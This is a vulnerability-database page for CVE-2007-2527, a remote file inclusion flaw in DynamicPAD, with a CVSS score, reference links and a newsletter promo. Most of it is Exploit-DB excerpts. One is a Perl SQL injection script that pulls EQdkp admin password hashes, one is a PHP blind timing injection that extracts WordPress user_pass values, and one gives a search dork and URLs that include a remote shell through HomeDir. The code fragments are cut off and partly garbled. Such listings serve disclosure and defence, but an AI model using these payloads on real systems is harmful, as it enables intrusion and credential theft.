CVE-2007-2527
published 2007-05-08CVE-2007-2527: Multiple PHP remote file inclusion vulnerabilities in DynamicPAD before 1.03.31 allow remote attackers to execute arbitrary PHP code via a URL in the HomeDir…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.64%
88.2th percentile
Multiple PHP remote file inclusion vulnerabilities in DynamicPAD before 1.03.31 allow remote attackers to execute arbitrary PHP code via a URL in the HomeDir parameter to (1) dp_logs.php or (2) index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dynamicpad | dynamicpad | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EQdkp 1.3.2 - 'listmembers.php' SQL Injection
exploitdb·2007-06-04
CVE-2007-3077 EQdkp 1.3.2 - 'listmembers.php' SQL Injection
EQdkp 1.3.2 - 'listmembers.php' SQL Injection
---
#!/usr/bin/perl -w
#################################################################################
# #
# EQdkp new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
print "-------------------------------------------------------------------------\r\n";
print " EQdkp content =~ /">(.*?)/){
print "[+] Admin User : $1\n";}
else {print "\n[-] Unable to retrieve admin username..."}
if($res->content =~ /">([0-9a-fA-F]{32})/){
print "[+] Admin Hash : $1";}
Exploit-DB
WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
exploitdb·2007-05-21
CVE-2007-2821 WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
---
$ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}
echo "\nFinal result: $field=$out\n\n";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post)
Exploit-DB
DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion
exploitdb·2007-05-07
CVE-2007-2527 DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion
DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion
---
#DynamicPAD Remote file inclusion (HomeDir)
#Download script : http://dynamicpad.org/dp.tar.gz
#Thanks Str0ke
#Dork : "Powered By DynamicPAD"
#Exploit :
#http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?
#http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger[at]Hotmail[dot]com
# milw0rm.com [2007-05-07]
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-May/001591.htmlhttp://attrition.org/pipermail/vim/2007-May/001593.htmlhttp://dynamicpad.org/http://secunia.com/advisories/25176http://www.securityfocus.com/bid/23861http://www.vupen.com/english/advisories/2007/1681https://exchange.xforce.ibmcloud.com/vulnerabilities/34125https://www.exploit-db.com/exploits/3868http://attrition.org/pipermail/vim/2007-May/001591.htmlhttp://attrition.org/pipermail/vim/2007-May/001593.htmlhttp://dynamicpad.org/http://secunia.com/advisories/25176http://www.securityfocus.com/bid/23861http://www.vupen.com/english/advisories/2007/1681https://exchange.xforce.ibmcloud.com/vulnerabilities/34125https://www.exploit-db.com/exploits/3868
2007-05-08
Published